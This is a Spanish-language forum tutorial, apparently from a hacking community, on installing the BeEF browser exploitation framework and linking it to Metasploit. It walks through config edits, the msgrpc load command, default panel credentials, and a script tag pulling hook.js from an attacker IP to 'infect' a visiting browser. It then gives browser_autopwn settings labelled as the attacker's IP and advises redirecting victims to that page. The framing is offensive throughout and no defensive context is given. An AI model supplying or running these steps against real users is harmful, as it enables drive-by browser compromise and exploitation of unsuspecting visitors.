Bueno, hoy os traigo un tutorial, es bastante básico pero lo busqué para ver si estaba y no lo encontré asique os lo hago para vosotros ;D
Vamos a empezar por descargar el beef --> https://github.com/beefproject/beef/archive/beef-0.4.4.6.1.zip o http://beefproject.com/
Para que funcione, necesitamos tener instalado las siguientes depencias: https://github.com/beefproject/beef/wiki/Installation (os lo detallaría más, pero no se que s.o usáis cada uno xD)
Una vez todo instalado, vamos a integrarlo con metasploit, para ello vamos al directorio donde tenemos los archivos del beef.
(http://oi39.tinypic.com/5m0byx.jpg)
Localizamos el fichero config.yaml y lo abrimos, vamos a la línea 113 o bien buscamos la palabra "metasploit"
Y lo activamos de esta manera:
metasploit:
enable: true
Grabamos el archivo y nos dirigimos de nuevo al directorio del beef después a extensions/metasploit y buscamos un fichero que se llama config.yaml
Modificamos las líneas introduciendo la IP de nuestro ordenador. Para evitar conflictos por si nuestra IP cambia, pondremos 127.0.0.1
host: "127.0.0.1"
Una vez configurados los dos archivos, ejecutamos metasploit:
(http://oi40.tinypic.com/9fw5m0.jpg)
Una vez se haya cargando, introducimos lo siguiente: (Teneis que ponerlo respecto a como tengais el config.yaml de /extensions/metasploit)
load msgrpc SeverHost=127.0.0.1 Pass=abc123
(http://oi44.tinypic.com/ojk0ar.jpg)
(http://oi40.tinypic.com/2i11gfs.jpg)
Una vez hayamos hecho esto, vamos a ejecutar beef, para ello accedemos al directorio y lo ejecutamos de esta manera.
./beef -x -v
(http://oi39.tinypic.com/333cv0n.jpg)
Esperamos a que cargue, una vez finalizado, podemos ver la dirección de nuestro panel:
(http://oi40.tinypic.com/206mzxi.jpg)
Accedemos a esa dirección y nos logueamos:
Usuario: beef
Contraseña: beef
(http://oi40.tinypic.com/91jl9g.jpg)
Ahora vamos a infectar a una máquina, en mi caso seré yo mismo xD
Para infectar a una máquina hay que conseguir que cargue el fichero hook.js, para ello en una página web habría que introducir lo siguiente:
<script src="http://192.168.1.34:3000/hook.js"></script>
Una vez tengamos a la máquina en el panel podemos iniciar el ataque.
(http://oi41.tinypic.com/qqvq5u.jpg)
(http://oi39.tinypic.com/353cw1c.jpg)
Como vemos, en el apartado de metasploit nos salen los exploits, ya que lo hemos implementado anteriormente.
(http://oi40.tinypic.com/2ebhelu.jpg)
Otro método de ataque es cargar el autopwn de metasploit y luego redirigir a la víctima a la dirección del autopwn:
Para cargarlo, vamos a la consola de metasploit e introducimos estos parámetros:
use auxiliary/server/browser_autopwn (Usar el modulo browser_autopwn)
set lhost 192.168.1.34 (IP del Atacante)
set srvhost 192.168.1.34 (IP del Atacante)
set uripath / (Path del link a enviar)
set srvport 8080 (Puerto)
exploit
(http://oi39.tinypic.com/j5a1ko.jpg)
Y esperamos a que termine de cargar... (en un ataque se recomienda tener ya el autopwn cargado ya que tarda).
(http://oi39.tinypic.com/2hcgjzm.jpg)
Una vez cargando, vamos a redirigir a la víctima a la página que nos genera el autopwn:
(http://oi43.tinypic.com/3143rpu.jpg)
(http://oi39.tinypic.com/2uz40p5.jpg)
Posibles errores al ejecutar beef.
(http://oi44.tinypic.com/2v7vz80.jpg)
Solución:
-Actualizar Ruby o bien:
(http://oi39.tinypic.com/k3oio1.jpg)
(http://oi40.tinypic.com/4jp9oj.jpg)
Visitar: https://rvm.io/rvm/install si teneis ese error, para instalar rvm
Y eso es todo, ya tendríamos el beef integrado con metasploit y perfectamente funcionando ;D
Un saludo.